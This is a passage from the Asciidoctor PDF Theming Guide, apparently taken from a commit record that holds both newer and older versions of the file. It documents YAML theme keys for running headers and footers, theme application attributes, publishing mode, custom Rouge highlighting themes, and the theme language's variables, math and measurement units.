{vbar} dashed {vbar} dotted +\n(default: solid)\n|header:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: $base_border_width)\n|header:\n border_width: 0.25\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|header:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|header:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|header:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|header:\n font_style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n height: 0.75in\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|header:\n line_height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|header:\n padding: [0, 3, 0, 3]\n\n|image_vertical_align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n image_vertical_align: 4\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|header:\n vertical_align: middle\n\n|<side>_columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|header:\n recto:\n columns: <25% =50% >25%\n\n|<side>_<position>_content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|header:\n recto:\n left:\n content: '\\{page-number}'\n\n3+|[#key-prefix-footer]*Key Prefix:* <<key-prefix-footer,footer>>\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: _not 
set_)\n|footer:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n border_color: #dddddd\n\n|border_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|footer:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: $base_border_width)\n|footer:\n border_width: 0.25\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|footer:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|footer:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|footer:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|footer:\n font_style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n height: 0.75in\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|footer:\n line_height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|footer:\n padding: [0, 3, 0, 3]\n\n|image_vertical_align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n image_vertical_align: 4\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|footer:\n vertical_align: top\n\n|<side>_columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|footer:\n verso:\n columns: <50% =0% <50%\n\n|<side>_<position>_content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|footer:\n verso:\n center:\n content: '\\{page-number}'\n|===\n. The background color spans the width of the page, as does the border when a background color is specified.\n. If the height is not set, the running content at this periphery is disabled.\n. If the side padding is negative, the content will bleed into the margin of the page.\n. `<side>` can be `recto` (right-hand, odd-numbered pages) or `verso` (left-hand, even-numbered pages).\nWhere the page sides fall in relation to the physical or printed page number is controlled using the `pdf-folio-placement` attribute (except when `media=prepress`, which implies `physical`).\n. 
`<position>` can be `left`, `center` or `right`.\n\nIMPORTANT: You must define a height for the running header or footer; otherwise, it will not be shown.\n\nIf you define running header and footer content in your theme, you can still disable this content per document by setting the `noheader` and `nofooter` attributes in the AsciiDoc document header, respectively.\n\nIf content is not specified for the running footer, the page number (i.e., `\\{page-number}`) is shown on the left on verso pages and the right on recto pages.\nYou can disable this behavior by defining the attribute `nofooter` in the AsciiDoc document header or by defining the key `footer_<side>_content: none` in the theme.\n\nTIP: Although not listed in the table above, you can control the font properties used for running content for each column position on each page side (e.g., `footer_<side>_<position>_font_color`).\nFor example, you can set the font color used for the right-hand column on recto pages by setting `footer_recto_right_font_color: 6CC644`.\n\n==== Attribute References\n\nYou can use _any_ attribute defined in your AsciiDoc document (such as `doctitle`) in the content of the running header and footer.\nIn addition, the following attributes are also available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* part-title\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nYou can also use built-in AsciiDoc text replacements like `+(C)+`, numeric character references like `+&#169;+` and inline formatting (e.g., bold, italic, monospace).\n\nHere's an example that shows how attributes and replacements can be used in the running footer:\n\n[source,yaml]\n----\nheader:\n height: 0.75in\n line_height: 1\n recto:\n center:\n content: '(C) ACME -- v{revnumber}, {docdate}'\n verso:\n center:\n content: $header_recto_center_content\nfooter:\n height: 0.75in\n line_height: 1\n recto:\n right:\n content: '{section-or-chapter-title} | *{page-number}*'\n verso:\n left:\n content: '*{page-number}* | {chapter-title}'\n----\n\nYou can split the content value across multiple lines using YAML's multiline string syntax.\nIn this case, the single quotes around the string are not necessary.\nTo force a hard line break in the output, add `{sp}+` to the end of the line in normal AsciiDoc fashion.\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n line_height: 1.2\n recto:\n right:\n content: |\n Section Title - Page Number +\n {section-or-chapter-title} - {page-number}\n verso:\n left:\n content: |\n Page Number - Chapter Title +\n {page-number} - {chapter-title}\n----\n\nTIP: You can use most AsciiDoc inline formatting in the values of these keys.\nFor instance, to make the text bold, surround it in asterisks (as shown above).\nOne exception to this rule is inline images, which are described in the next section.\n\n==== Images\n\nYou can add an image to the running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with text.\n\nHere's an example of how to use an image in the running header (which also applies to the footer).\n\n[source,yaml,subs=attributes+]\n----\nheader:\n height: 0.75in\n image_vertical_align: 2 {conum-guard-yaml} <1>\n recto:\n center:\n content: image:footer-logo.png[width=80]\n verso:\n center:\n content: $header_recto_center_content\n----\n<1> You can use the `image_vertical_align` key to slightly nudge the image up or down.\n\nCAUTION: By default, the image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the image width as needed using the `pdfwidth` attribute.\nAlternatively, you can set the `fit` attribute to `scale-down` (e.g., `fit=scale-down`) to reduce the image size to fit in the available space or `contain` (e.g., `fit=contain`) to resize the image to the maximum size that will fit.\n
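\nFor instance, here's a minimal sketch of a running footer whose logo is allowed to shrink to the space that remains (the image file name is hypothetical):\n\n[source,yaml]\n----\nfooter:\n  height: 0.75in\n  recto:\n    right:\n      content: image:acme-logo.png[fit=scale-down]\n  verso:\n    left:\n      content: image:acme-logo.png[fit=scale-down]\n----\n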
\n== Applying Your Theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-stylesdir` attribute and just pass the path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommended that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-stylesdir=\/path\/to\/resources\/themes -a pdf-style=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n\nAs usual, you can also use build tools like Maven and Gradle to build a themed PDF.\nThe only thing you need to add to an existing build is the attributes mentioned above.\n\n* https:\/\/github.com\/asciidoctor\/asciidoctor-maven-examples\/tree\/master\/asciidoctor-pdf-with-theme-example[Maven Example]\n* https:\/\/github.com\/asciidoctor\/asciidoctor-gradle-examples\/tree\/master\/asciidoc-to-pdf-with-theme-example[Gradle Example]\n\n== Theme-Related Document Attributes\n\nThere are various settings in the theme you can control using document attributes.\nThese settings override equivalent keys defined in the theme file, where applicable.\n\n[cols=\"2,3,6l\"]\n|===\n|Attribute |Value Type |Example\n\n|autofit-option\n|flag (default: _not set_)\n|:autofit-option:\n\n|chapter-label\n|string (default: Chapter)\n|:chapter-label: Chapitre\n\n|<face>-cover-image^[1]^\n|path^[2]^ 
{vbar} image macro^[3]^ +\n(format can be image or PDF)\n|:front-cover-image: image:front-cover.pdf[]\n\n|media\n|screen {vbar} print {vbar} prepress\n|:media: prepress\n\n|page-background-image^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image: image:bg.jpg[]\n\n|pagenums^[5]^\n|flag (default: _set_)\n|:pagenums:\n\n|pdf-page-layout\n|portrait {vbar} landscape\n|:pdf-page-layout: landscape\n\n|pdf-page-margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n|:pdf-page-margin: [1in, 0.5in]\n\n|pdf-page-size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width, height]>>\n|:pdf-page-size: 6in x 9in\n\n|pdf-folio-placement\n|virtual {vbar} virtual-inverted {vbar} physical {vbar} physical-inverted\n|:pdf-folio-placement: physical\n\n|pdfmark^[6]^\n|flag (default: _not set_)\n|:pdfmark:\n\n|text-alignment^[7]^\n|<<text-alignments,Text alignment>>\n|:text-alignment: left\n\n|title-logo-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-logo-image: image:logo.png[top=25%, align=center, pdfwidth=0.5in]\n\n|title-page^[8]^\n|flag (default: _not set_)\n|:title-page:\n\n|title-page-background-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-page-background-image: image:title-bg.jpg[]\n|===\n\n. `<face>` can be `front` or `back`.\n. The path is resolved relative to base_dir.\n. The target of the image macro is resolved relative to `imagesdir`.\nIf the image macro syntax is not used, the value is resolved relative to the base directory, which defaults to the document directory.\n. Page background images are automatically scaled to fit within the bounds of the page.\n+\nNOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.\nThis limitation is due to a bug in Prawn 1.3.1.\nThe limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).\nFor more details, see http:\/\/discuss.asciidoctor.org\/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].\n. Controls whether the `page-number` attribute is accessible to the running header and footer content specified in the theme file.\nUse the `noheader` and `nofooter` attributes to disable the running header and footer, respectively, from the document.\n. Enables generation of the http:\/\/milan.kupcevic.net\/ghostscript-ps-pdf\/#marks[pdfmark] file, which contains metadata that is fed to Ghostscript when optimizing the PDF file.\n. _(Experimental)_ The `text-alignment` document attribute is intended as a simple way to toggle text justification.\nThe value of this attribute overrides the `base_align` key set by the theme.\nFor more fine-grained control, you should customize using the theme.\n. 
Force a title page to be added even when the doctype is not book.\n\n== Publishing Mode\n\nAsciidoctor PDF provides the following features to assist with publishing:\n\n* Double-sided (mirror) page margins\n* Automatic facing pages\n\nThese features are activated when you set the `media` attribute to `prepress` in the header of your AsciiDoc document or from the CLI or API.\nThe following sections describe the behaviors that this setting activates.\n\n=== Double-Sided Page Margins\n\nThe page margins for the recto (right-hand, odd-numbered) and verso (left-hand, even-numbered) pages are automatically calculated by replacing the side page margins with the values of the `page_margin_inner` and `page_margin_outer` keys.\n\nFor example, let's assume you've defined the following settings in your theme:\n\n[source,yaml]\n----\npage:\n margin: [0.5in, 0.67in, 0.67in, 0.67in]\n margin_inner: 0.75in\n margin_outer: 0.59in\n----\n\nThe page margins for the recto and verso pages will be resolved as follows:\n\nrecto page margin:: [0.5in, *0.59in*, 0.67in, *0.75in*]\nverso page margin:: [0.5in, *0.75in*, 0.67in, *0.59in*]\n\nThe page margins alternate between recto and verso.\nThe first page in the document is a recto page.\n\n=== Automatic Facing Pages\n\nWhen converting the book doctype using the prepress media setting, a blank page will be inserted when necessary to ensure the following elements start on a recto page:\n\n* Title page\n* Table of contents\n* First page of body\n* Parts and chapters\n\nOther \"`facing`\" pages may be added in the future.\n\nIt's possible to disable the automatic facing feature for a given part or chapter.\nThis can be done by adding the `nonfacing` option to the section node.\nWhen the `nonfacing` option is present, the part or chapter title will be placed on the following page.\n\n[source,asciidoc]\n----\n[%nonfacing]\n= Minor Chapter\n\ncontent\n----\n\nFor documents that use the article doctype, Asciidoctor PDF incorrectly places the document title and table of contents on their own pages.\nThis can cause the page numbering and the page facing to fall out of sync.\nAs a workaround, Asciidoctor PDF inserts a blank page, if necessary, to ensure the first page of body content is a recto-facing page.\n\nYou can check on the status of this defect by following https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/95[issue #95].\n
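\nFor example, here's how you'd activate publishing mode from the CLI by setting the `media` attribute (the document name is just a placeholder):\n\n $ asciidoctor-pdf -a media=prepress book.adoc\n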
\n== Source Highlighting Theme\n\nYou can define and apply your own source highlighting theme to source blocks when using Rouge as the source highlighter.\nThis section explains how.\n\nA custom theme for Rouge is defined using a Ruby class.\nStart by creating a Ruby source file to define your theme.\nName the file according to the name of your theme and put the file in a folder of your choice (e.g., [.path]_rouge_themes\/custom.rb_).\nThe name of the Ruby class doesn't matter, though it's customary to name it according to the name of the theme as well.\n\n.rouge_themes\/custom.rb\n[source,ruby]\n----\nrequire 'rouge' unless defined? ::Rouge.version\n\nmodule Rouge; module Themes\n class Custom < CSSTheme\n name 'custom'\n\n style Comment, fg: '#008800', italic: true\n style Error, fg: '#a61717', bg: '#e3d2d2'\n style Str, fg: '#0000ff'\n style Str::Char, fg: '#800080'\n style Num, fg: '#0000ff'\n style Keyword, fg: '#000080', bold: true\n style Operator::Word, bold: true\n style Name::Tag, fg: '#000080', bold: true\n style Name::Attribute, fg: '#ff0000'\n style Generic::Deleted, fg: '#000000', bg: '#ffdddd', inline_block: true, extend: true\n style Generic::Inserted, fg: '#000000', bg: '#ddffdd', inline_block: true, extend: true\n style Text, {}\n end\nend; end\n----\n\nEach style declaration accepts the following properties:\n\n* `fg` - sets the foreground (text) color\n* `bg` - sets the background color\n* `bold` - changes the font weight to bold\n* `italic` - changes the font style to italic\n* `underline` - adds an underline to the text\n* `inline_block` - fills the background color to the height of the line (Asciidoctor PDF only)\n* `extend` - extends the background color to the end of the line for a line-oriented match (Asciidoctor PDF only)\n\nColors are defined using hexadecimal format (e.g., #ff0000 for red).\n\nUse the `Text` token to set the background color of the source block and the default text color.\n\nThe complete list of tokens can be found in the https:\/\/github.com\/jneen\/rouge\/blob\/master\/lib\/rouge\/token.rb[token.rb] file from Rouge.\nRefer to the https:\/\/github.com\/jneen\/rouge\/tree\/master\/lib\/rouge\/themes[bundled themes] to find more examples.\n\nOnce you've defined your theme, you need to enable it using the `rouge-style` document attribute, which you specify in the document header or via the Asciidoctor CLI or API.\n\n[source,asciidoc]\n----\n:source-highlighter: rouge\n:rouge-style: custom\n----\n\nFinally, you need to activate your theme by requiring the theme file when you invoke Asciidoctor.\n\n $ asciidoctor -r .\/rouge_themes\/custom.rb sample.adoc\n\nYou should now see that the source code is highlighted to your liking.\nFor more information about source highlighting with Rouge, refer to the http:\/\/rouge.jneen.net\/[Rouge project page].\n\n\/\/\/\/\n== Resources for Extending Asciidoctor PDF\n\n* http:\/\/www.sitepoint.com\/hackable-pdf-typesetting-in-ruby-with-prawn[Hackable PDF typesetting in Ruby with Prawn]\n\/\/\/\/\n","old_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux[@mojavelinux]>\n\/\/ Settings:\n:idprefix:\n:idseparator: -\n:toc: preamble\nifndef::env-github[:icons: font]\nifdef::env-github[]\n:outfilesuffix: .adoc\n:!toc-title:\n:caution-caption: :fire:\n:important-caption: :exclamation:\n:note-caption: :paperclip:\n:tip-caption: :bulb:\n:warning-caption: :warning:\nendif::[]\n:window: _blank\n\/\/ Aliases:\n:conum-guard-yaml: #\nifndef::icons[:conum-guard-yaml: # #]\nifdef::backend-pdf[:conum-guard-yaml: # #]\n\n\/\/\/\/\nTopics remaining to document:\n* line height and line height length (and what that all means)\n* title page layout \/ title page images (logo & background)\n* document that unicode escape sequences can be used inside double-quoted strings\n\/\/\/\/\n\n[.lead]\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file Asciidoctor PDF generates from AsciiDoc.\nThis document describes how the theming system works, how to define a custom theme in YAML and how to activate the theme when running Asciidoctor PDF.\n\nIMPORTANT: If you're creating a custom theme, 
you're expected to supply your own fonts.\nWe recognize this can be a major obstacle when you're starting out.\nTherefore, your other option is to simply redeclare the fonts from the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default theme] in the <<Custom Fonts,font catalog>>.\nAsciidoctor PDF will then resolve the fonts that are bundled with the gem.\n\nWARNING: If you don't declare your own fonts, the built-in (AFM) fonts declared in https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/base-theme.yml[base theme] will be used instead.\nUsing AFM fonts can result in missing functionality and warnings.\nSee the <<Built-In (AFM) Fonts>> section to learn more about these limitations.\n\ntoc::[]\n\n== Language Overview\n\nThe theme language in Asciidoctor PDF is based on the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many concepts from CSS and SASS.\nTherefore, if you have a background in web design, the theme language should be immediately familiar to you.\n\nLike CSS, themes have both selectors and properties.\nSelectors are the component you want to style.\nThe properties are the style elements of that component that can be styled.\nAll selector names are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_size`).\n\n[NOTE]\n====\nThe theme language in Asciidoctor PDF supports a limited subset of the properties from CSS.\nSome of these properties have different names from those found in CSS.\n\n* Underscores (`_`) can be used in place of hyphens (`-`) for all property names in the theme language.\n* Instead of separate properties for font weight and font style, the theme language combines these settings in the `font_style` property (allowed values: `normal`, `bold`, `italic` and `bold_italic`).\n* The `text_align` property from CSS is the `align` property in the theme language.\n* The `color` property from CSS is the `font_color` property in the theme language.\n====\n\nA theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n line_height_length: 17\n line_height: $base_line_height_length \/ $base_font_size\nvertical_spacing: $base_line_height_length\nheading:\n font_color: #262626\n font_size: 17\n font_style: bold\n line_height: 1.2\n margin_bottom: $vertical_spacing\nlink:\n font_color: #002FA7\noutline_list:\n indent: $base_font_size * 1.5\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme, which is loaded prior to loading your custom theme.\nAll the available keys are documented in <<Keys>>.\nThe converter uses the information from the theme map to help construct the PDF.\n\nWARNING: If you start a new theme from scratch, we strongly recommend defining TrueType fonts and specifying them in the `base` and `literal` 
categories.\nOtherwise, Asciidoctor PDF will use built-in AFM fonts, which can result in missing functionality and warnings.\n\n[TIP]\n====\nInstead of creating a theme from scratch, another option is to download the https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/blob\/master\/data\/themes\/default-theme.yml[default-theme.yml] file from the source repository.\nSave the file using a unique name (e.g., _custom-theme.yml_) and start hacking on it.\n\nAlternatively, you can snag the file from your local installation using the following command:\n\n $ ASCIIDOCTOR_PDF_DIR=`gem contents asciidoctor-pdf --show-install-dir`;\\\n cp \"$ASCIIDOCTOR_PDF_DIR\/data\/themes\/default-theme.yml\" custom-theme.yml\n====\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented two spaces beyond the indentation of its parent level.\nAlso note the presence of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n - Enumerated type (where specified)\n - Text content (where specified)\n* Null (clears any previously assigned value)\n - _empty_ (i.e., no value specified)\n - null\n - ~\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color as CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<Keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a principal feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* text_transform\n* line_height (currently some exceptions)\n* margin_bottom (if not specified, defaults to $vertical_spacing)\n\n
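For instance, in the following sketch the sidebar text picks up its font family and color from the enclosing content, because the `sidebar` category doesn't specify those keys (the values are purely illustrative):\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Noto Serif\nsidebar:\n # font_color and font_family are not set,\n # so sidebar text inherits them from the enclosing content\n font_size: 10.5\n----\n\n.Heading Inheritance\n****\nHeadings inherit starting from a specific heading level (e.g., `heading_h2_font_size`), then to the heading category (e.g., 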
`heading_font_size`), then directly to the base value (e.g., `base_font_size`).\nAny setting from an enclosing context, such as a sidebar, is skipped.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar sign (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In other words, as soon as the key is assigned, it's available to be used as a variable.)\n\nIMPORTANT: Variables are defined from top to bottom (i.e., in document order).\nTherefore, a variable must be defined before it is referenced.\nIn other words, the path the variable refers to must be *above* the usage of that variable.\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n----\n\nthe variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading_font_color` to the `sidebar_title_font_color` key.\n\n[source,yaml]\n----\nheading:\n font_color: #191919\nsidebar:\n title:\n font_color: $heading_font_color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n font_size_small: $base_font_size * 0.85\n----\n\nWe'll cover more about math expressions later.\n\n==== Custom Variables\n\nYou can define arbitrary key names to make custom variables.\nThis is one way to group reusable values at the top of your theme file.\nIf you are going to do this, it's recommended that you organize the keys under a custom namespace, such as `brand`.\n\nFor instance, here's how you can define your brand colors:\n\n[source,yaml,subs=attributes+]\n----\nbrand:\n primary: #E0162B {conum-guard-yaml} <1>\n secondary: '#FFFFFF' {conum-guard-yaml} <2>\n alert: '0052A5' {conum-guard-yaml} <3>\n----\n<1> To align with CSS, you may add a `+#+` in front of the hex color value.\nA YAML preprocessor is used to ensure the value is not treated as a comment, as would normally be the case in YAML.\n<2> You may put quotes around the CSS-style hex value to make it friendly to a YAML editor or validation tool.\n<3> The leading `+#+` on a hex value is entirely optional.\nHowever, we recommend that you always use either a leading `+#+` or surrounding quotes (or both) to prevent YAML from mangling the value.\n\nYou can now use these custom variables later in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: $brand_primary\n----\n\n=== Math Expressions & Functions\n\nThe theme language supports basic math operations for computing values.\nLike programming languages, multiply and divide take precedence over add and subtract.\n\nThe following table lists the supported operations and the corresponding operator for each.\n\n[width=25%]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nIMPORTANT: Operators must always be surrounded by a space on either side (e.g., 2 + 2, not 2+2).\n\n
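Since multiply and divide bind more tightly than add and subtract, an expression like `$base_font_size * 2 + 2` resolves to the doubled font size plus two points.\nHere's a sketch that relies on that precedence (`font_size_huge` is a custom variable introduced only for illustration):\n\n[source,yaml]\n----\nbase:\n font_size: 10\n # evaluates as (10 * 2) + 2 = 22, not 10 * (2 + 2) = 40\n font_size_huge: $base_font_size * 2 + 2\n----\n\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line_height: 4 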
\/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used, provided they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number down to the previous integer.\nceil(...):: Rounds the number up to the next integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n font_size_large: ceil($base_font_size * 1.25)\n----\n\n=== Measurement Units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nIf you specify a number without any units, the unit defaults to pt.\n\nHowever, we humans like to think in real-world units like inches (in), centimeters (cm), or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[width=25%]\n|===\n|Unit |Suffix\n\n|Centimeter\n|cm\n\n|Inch\n|in\n\n|Millimeter\n|mm\n\n|Percentage^[1]^\n|%, vw, or vh\n\n|Point\n|pt (default)\n|===\n\n. A percentage with the % unit is calculated relative to the width or height of the content area.\nViewport-relative percentages (vw or vh units) are calculated as a percentage of the page width or height, respectively.\nCurrently, percentage units can only be used for placing elements on the title page or for setting the width of a block image.\n\nIMPORTANT: Numbers with more than two digits should be written as a float (e.g., 100.0), a math expression (e.g., 1 * 100), or with a unit (e.g., 100pt).\nOtherwise, the value may be misinterpreted as a hex color (e.g., '100') and could cause the converter to crash.\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\n
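Since the unit notation is attached to each number individually, the values in a single margin array don't have to share a unit.\nThe following sketch (contrived, and purely for illustration) mixes units that all resolve to roughly the same length in points:\n\n[source,yaml]\n----\npage:\n # each value is converted to points independently\n # (2cm = 20mm = 0.79in = ~56.7pt)\n margin: [2cm, 20mm, 56.7pt, 0.79in]\n----\n\nThe order of elements in a measurement array is the same as it is in CSS:\n\n. top\n. right\n. bottom\n. 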
